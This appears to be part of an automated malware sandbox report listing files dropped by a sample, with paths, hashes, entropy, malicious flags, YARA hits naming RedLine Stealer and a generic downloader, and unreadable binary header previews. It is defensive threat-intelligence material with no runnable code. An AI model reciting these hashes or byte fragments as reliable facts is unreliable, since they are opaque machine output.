Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\plus[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3613.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4421000
Entropy (8bit):	7.98195304641259
Encrypted:	false
SSDEEP:
MD5:	1E40D9A53D79AA807EB8AF132F417E53
SHA1:	9CB867A33A7115138606479BAA740632F748BA81
SHA-256:	D803A1507AE95B77349968FA40C8B1A217C23CE7E54CCE2E5EF6CE73F7F576CA
SHA-512:	99B9AC8390D5FD7EC87AEC16E866DB0011AB8CE56D8A5CF54FEA97B257A5F3D2520726CE4FB238D57590A412F13D80F1BCA24AB5E4250EE23BBF86F3C82925EB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F..'r..'r..'r..u...'r..u.'r..u.3'r......'r..'s.?'r..u...'r..u.'r..u.'r.Rich.'r.................PE..L....U.c..................A.........j.........A...@...................................C.....................................L.B.P.....B..'...........jC...............................................................A..............................text.....A.......A................. ..`.rdata...9....A..:....A.............@..@.data....g...0B..&....B.............@....tutewi.A.....B......>B.............@....rsrc.....O...B..(...BB.............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3613.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	19755520
Entropy (8bit):	7.996091217969365
Encrypted:	true
SSDEEP:
MD5:	ED2FD5173AF900C56220101CE6648515
SHA1:	D8783B8DC155314C5680AEBDDD4E36DF7DDFEBBF
SHA-256:	FF3022CC92FD5E0EB46D34568825A3D914A3CE7D24CEA60660CDB3247956F098
SHA-512:	EF7BAC0140E2E492A4D1751D9A6D1FE6EC94649BD6A00006F159A067B774EE8870D567E0FAE2E08EBF16DB3D11C2DFE2FCF5884D7D27D74FDBA34781500F9806
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................h-...........-.. ....-...@.. ........................-...........@..................................-.S.....-.......................-...................................................... ............... ..H............text...4f-.. ...h-................. ..`.rsrc.........-......j-.............@..@.reloc........-......p-.............@..B..................-.....H.......$p-.............0(...G-..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,

C:\Users\user\AppData\Local\Temp\3FF8.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	580608
Entropy (8bit):	7.660255427914398
Encrypted:	false
SSDEEP:
MD5:	1A344159928228AF15C9BD838C73E319
SHA1:	07295709B38BF6BAB750669E09DFE4671E03A345
SHA-256:	50CB0C5541343E8B900DDC1CB400A91D95A1ECD7D70EF0195D7C875CE7225321
SHA-512:	289AE9C41D6A535E576DA4780B195A6BB79CD10CA9EEDF4F39B9BB8D46931443924ED3E9524ABC54C10CB7B3603BA218BA200AD6A90E80481126D4CD8D996C46
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....e................................. ........@.. .......................@.......7....`.....................................K.......B.................... ......Q................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc....... ......................@..B........................H.......(...d...............!,...........................................0..o.......8[...r...ps....z......8........(....(.... ....?....8....(.... .... .... ....s....(........8....~....:....8......(.....&~..........~......0..Q.......8........E........A.......R...C.......)...8....87... ....~;...{'...9....& ....8.......8.............i]..8Z...*.. ....<'... ....8...........8S... ...........8k......8....... ....8S... ...........8.......X..8m.........(.....8x............. ....~;

C:\Users\user\AppData\Local\Temp\4BEF.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5472256
Entropy (8bit):	7.353545386480907
Encrypted:	false
SSDEEP:
MD5:	04F93F610DF4D1C941EC7F64679E3039
SHA1:	11A8B38934A55D203FA78F13E9B7D24754BAF9DC
SHA-256:	351FADC9F1DDD2BD6BD34CEED2353B8211123E057B52C6AEB60A28643D92F137
SHA-512:	278AA98A5B62E5939150CEF08201A7344A95C3428F9E90E45C26DFACE8198ED6A1DD52FF830ED7E4DDD3FBC162D9E683EC11FD04AF62A505EE6FEEFCCC814B4B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...47....................Q...........Q.. ....Q...@.. ........................S...........@.................................p.Q.K.....Q.\|.....................S.......Q.............................................. ............... ..H............text....Q.. ....Q................. ..`.sdata........Q.......Q.............@....rsrc...\|.....Q.......Q.............@..@.reloc........S......~S.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5A58.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	459264
Entropy (8bit):	7.217548398117552
Encrypted:	false
SSDEEP:
MD5:	700A9938D0FCFF91DF12CBEFE7435C88
SHA1:	F1F661F00B19007A5355A982677761E5CF14A2C4
SHA-256:	946583A0803167DE24C7C0D768FE49546108E43500A1C2C838E7E0560ADDC818
SHA-512:	7FA6B52D10BCFC56AC4A43EDA11AE107347BA302CC5A29C446B2D4A3F93425DB486ED24A496A8ACD87D98D9CFB8CAD6505EB0D8D5D509BC323427B6931C8FFF8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......c.....................pD......!............@.......................... I.....l...........................................d.....G.................................................................@............................................text............................... ..`.rdata..>#.......$..................@..@.data.....B.........................@....rsrc.........G.....................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\617D.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	361984
Entropy (8bit):	7.901105145978524
Encrypted:	false
SSDEEP:
MD5:	1A28322108062B67D4248CBFE145DEBF
SHA1:	21B9C10D6B47110C3D08ECC6C6840F25867BD3C7
SHA-256:	0BB567E2EA8A5A51A7DF5CDA9166C33F3CB368D6669D1A83A456AA881059C2C1
SHA-512:	B2FCF6554E2A9B87C85DDA0B0E0C05A2A38E648C38ABF4755FE8619A12774F15A2FF77E1DE2CAC0D0A10C64548D629124F7914E683A36699AC24FEA8D53F27D9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^{_d.....................f......^<... ...@....@.. ....................................@..................................<..K....@...c........................................................................... ............... ..H............text...d.... ...................... ..`.rsrc....c...@...d... ..............@..@.reloc..............................@..B................@<......H.......D)..............@,...............................................0...........~......~....(....,.....+.......:.............s.........(........^..........:......................s......~..........(.....~..........(....... ....o....... ....o........o........o.........o........o.......o............io....s.....s...............-L. ...........+/...... ....o .................-.+.......o!........+...o".......o#....j.........:.....($.......+.......s%.......jo&....+a..o'........o

C:\Users\user\AppData\Local\Temp\7D14.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3974656
Entropy (8bit):	7.919437401798076
Encrypted:	false
SSDEEP:
MD5:	460167998760122937411C5191649DBA
SHA1:	5A898F22647AEB96FA6A8D6780C1504E7C1AF9C7
SHA-256:	390FB6C1462D5D3203028D5BF64DCC4E7FEDFCEDFC705B3C688D1F0B60D7F264
SHA-512:	DD9C45C5130C18DF1BAB2AEB3E0C58CF6895A61F80574720EE3500EE295245CF775871A6A14F3B0FA19D73815FA27A5239688F93205C206B5CB31A9837553D75
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..x...........F\.. ........@.. ..............................KF=...@.................................:@..P....`..X........................................................................................................... ..... ...................... ..` .\|.......*..................@..@ ..... ......................@..B.idata... ...@......................@....rsrc.... ...`......................@..@.themida..W.........................`....boot.....:...\...:.................`..`........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\907.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4818944
Entropy (8bit):	7.0734643050422275
Encrypted:	false
SSDEEP:
MD5:	1713300BA962C869477E37E4B31E40AF
SHA1:	D5C4835BC910ACCCD28DBED0C451043EA8DE95EF
SHA-256:	2BCDB7A75707F841615BE19F4BBCB95FC6B16CE19FB7EA782C5FF43EA1BE024D
SHA-512:	70B2A2B17C6B3A0A295BAF536451EF38C6E9E292A3C967A9FC950A6DE321BBAC0DC45E942EF151BA81B717F8EDE3166388E68CE75F2AFFF0EC16AEA98EA742E1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\907.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....})...............P..H..\.......HH.. ...`H...@.. ........................I...........@..................................GH.K....`H.0X....................I.....iGH.............................................. ............... ..H............text...$(H.. ...H................. ..`.rsrc...0X...`H..Z...,H.............@..@.reloc........I.......I.............@..B.................HH.....H.......0...XF......?......]@............................................(....:..(....8......&~..........~......0..o.......8-.......E....>...89...s......... .....9....&8....s.........8....s.........8....s.........8....s.........8......0..$.......8....8....8.......~....o......8.....0...........~....o......8......8....8......0..$.......8......8....8.....~....o......8.....0..$.......8......8....8.....~....o .....8.....0..$.......8......*.~....o!.....8....8....8....&~..

C:\Users\user\AppData\Local\Temp\9234.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3632640
Entropy (8bit):	6.982049154160612
Encrypted:	false
SSDEEP:
MD5:	9C815131562310CCECBBE81C49E57029
SHA1:	71B782B3C19123B2C6AAB622ED365ACFB8110CBA
SHA-256:	4954AE0F16D41249DA84F1FCA804B5E38D4AB9E637F8AE41C8FD65B14DF256BC
SHA-512:	5734AE24418BE7A6249EB5CB955E84871148BBD6DEE75DA467C0247905DE7327B165B5153C3312E43D14FB1B547EE584034FF1BD29C45246C0B2A32E8CF6D37C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,.e.........."...0..j7...........7.. ....7...@.. ........................7...........@...................................7.S.............................7...................................................... ............... ..H............text....i7.. ...j7................. ..`.reloc........7......l7.............@..B..........................................................7.....H............).....b....................................................(.......8.Y........ir.....~.(.......8.Y..S.$k.....H...)hL`............HN.{......5H....]f.9U."T.;..g,........>[A......;u.X,RqN,...H"l.Xi..D.Y..../.....)..,.j.....8..O.\|oV...s].....XsBl..l..D....?.kM.5.X.."..CL...../.W..=.............3.b..).]1....dA.%..6.#..%..\>..^...s....'..p%d......i?....G...84N.y.;>.:.H......m8.aC..z.=...E."o......l!B..M/.g.._..s...Z...<.7C.,.Q...."F@~...iq.j0

C:\Users\user\AppData\Local\Temp\A203.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	307200
Entropy (8bit):	4.99875982143628
Encrypted:	false
SSDEEP:
MD5:	246EB9F40EF75F048C065DE2F8903289
SHA1:	4981B266CDCDE107B1E4F518310C1DA48393D813
SHA-256:	3E6DF4AA04A87D7B60AE86FB92674A5E2BD840F48AA420E6E574A5E61950B23F
SHA-512:	378C93C65A76ED54E748488FC3FA82E2823A4C0B402382C81FB51407D2839E35396A300B5B1D6E7D7353761CA4869CE9372EECD700C53D60B76321239BDCD200
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\A203.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....i...............0.............~.... ... ....@.. ....................... ............@.................................0...K.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................`.......H.......L:..@v......z.......................................................(......0..A........s........~....%:....&~..........s....%.....(...+o.....8.....o...............%.r...prY..p~....(.....%.rq..pr...p~....(.....%.r...pr...p~....(.....%.r!..pra..p~....(.....(.......o......8,.....(......s.......s........~....}....~...........s....(....o....}......{....rq..pr...p~....(....o........9.....r...pr...p~....(.......8A......r...pra..p~....(....o....:......{....(....8......{....

C:\Users\user\AppData\Local\Temp\ABF7.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	559441
Entropy (8bit):	7.1664465150996755
Encrypted:	false
SSDEEP:
MD5:	2E5700376F42724B69E46594A77BC47A
SHA1:	438330BE28693D600713F86EDA281E354881E3C9
SHA-256:	2A869B8ECC0C7436DEE5A1E3EC7C0D1870EF92B198B355524EED6CCF1554B16E
SHA-512:	B460F1C00F4BF269F5C692B5FFFEB509395C9872A0BC019A5C8EF164D6974D06893A48BD0BDE3DB3D230E08CE7BBD3BA41F99D3E7C79E55FD32746C91E951C2E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g..[..][..][..].t.\Q..].t.\...].t.\O..].t.\X..][..]...].x.\}..].x.\J..].x.\I..][..]Z..]By.\Z..]Rich[..]........................PE..L...T..e...............$.............S.......0....@.......................................@.............................C......(...............................x...p...................................@............0..0............................text...3........................... ..`.rdata...e...0...f..................@..@.data....>.......6...\|..............@....reloc..x...........................@..B.8EAN...........Q......................@........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Aiqcqejy.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BroomSetup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5515264
Entropy (8bit):	6.479505821994318
Encrypted:	false
SSDEEP:
MD5:	00E93456AA5BCF9F60F84B0C0760A212
SHA1:	6096890893116E75BD46FEA0B8C3921CEB33F57D
SHA-256:	FF3025F9CF19323C5972D14F00F01296D6D7A71547ECA7E4016BFD0E1F27B504
SHA-512:	ABD2BE819C7D93BD6097155CF84EAF803E3133A7E0CA71F9D9CBC3C65E4E4A26415D2523A36ADAFDD19B0751E25EA1A99B8D060CAD61CDFD1F79ADF9CD4B4ECA
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......^..................?..........1?......@?...@..........................PV..................@...................0B.......A.@<...0G......................`B.t............................PB.....................p.A.D.... B......................text...\.>.......>................. ..`.itext...A....>..B....>............. ..`.data...d....@?.......?.............@....bss........ @..........................idata..@<....A..>....?.............@....didata...... B......:@.............@....edata.......0B......F@.............@..@.tls....T....@B..........................rdata..]....PB......H@.............@..@.reloc..t....`B......J@.............@..B.rsrc........0G.......E.............@..@.............PV......(T.............@..@................

C:\Users\user\AppData\Local\Temp\Costura\1485B29524EF63EB83DF771D39CCA767\64\sqlite.interop.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1830064
Entropy (8bit):	6.605471997717241
Encrypted:	false
SSDEEP:
MD5:	02F50A23E31D1F21AA21AE52FAF3C05A
SHA1:	5B21234729DEDFA1B456138872EF2A046B9EE86F
SHA-256:	5F0E72E1839DB4AA41F560E0A68C7A95C9E1656BC2F4F4FF64803655D02E5272
SHA-512:	BC2FCCA125506D9B762DF4E9DF24A907B9E554D857E705945AE252E7E6B50DADA043EF0E69828B780AC9B569053FCF912C27A770469A80F1F6094C146AFDB9B0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......rIF.6((.6((.6((.-....((.-....((.-...$((.?P..>((.(z..5((.6()..((.-...7((.-...7((.-...7((.-...7((.Rich6((.........................PE..d.....d.........." ................`O..............................................JN....@.........................................0G.......8..x................".......T...........................................................................................text............................... ..`.rdata..............................@..@.data...8....`...\|...H..............@....pdata...".......$..................@..@text....^....@......................@.. data.....c...`...d..................@..@.rsrc................j..............@..@.reloc...".......$...t..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Hoeshk.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Hpstg.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3613.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	2349777
Entropy (8bit):	7.989509381889276
Encrypted:	false
SSDEEP:
MD5:	31F42479194700F598C22EA83FA196C1
SHA1:	0552CA7766283D7ADD7C06312ECB5E858D3A2EA0
SHA-256:	098B76A1D654EFE963B1D6167DC77D34627B8488D742C49BFB70E8D70B1755A7
SHA-512:	AFC83E94DC92453312A4D24193B0D3C17CF37644A5CF25B2C934F27D58968C41A5B176DE12C2C5C5C8C1D2FBDB57D235A5073FE304F6B12E11A40E2CB52EE836
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@..........................@............@..........................................P..`............................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc...`....P......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Jqufhiv.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Nrdshcwlr.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Nuampsm.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\9234.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
